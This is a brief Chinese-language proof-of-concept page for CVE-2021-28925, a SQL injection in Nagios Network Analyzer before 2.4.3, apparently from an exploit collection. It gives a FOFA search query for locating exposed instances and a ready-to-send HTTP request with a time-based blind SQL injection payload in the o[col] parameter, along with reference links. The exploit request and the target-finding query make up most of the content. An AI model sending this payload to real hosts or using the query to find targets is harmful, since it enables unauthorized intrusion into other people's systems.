Nagios Network Analyzer SQL 注入漏洞（CVE-2021-28925）

Nagios Network Analyzer 2.4.3 之前的版本中存在 SQL 注入漏洞。参数为 o[col] 接口为 api/checks/read/.

FOFA:title="Nagios Network Analyzer"

影响版本：Nagios Network Analyzer < 2.4.3

PoC：

GET /api/checks/read?o[col]=+AND+(SELECT+777+FROM+(SELECT(SLEEP(15)))LURIEL_STOLABS) HTTP/1.1
HOST:target
....
Payload:+AND+(SELECT+777+FROM+(SELECT(SLEEP(15)))LURIEL_STOLABS)

ref:

https://nvd.nist.gov/vuln/detail/CVE-2021-28925
https://www.nagios.com/downloads/nagios-network-analyzer/change-log/
https://medium.com/stolabs/issues-found-on-nagios-network-analyzer-2-4-2-50ec4ffb5e25

Nagios Network Analyzer SQL 注入漏洞（CVE-2021-28925）

Nagios Network Analyzer SQL 注入漏洞（CVE-2021-28925）

results matching ""

No results matching ""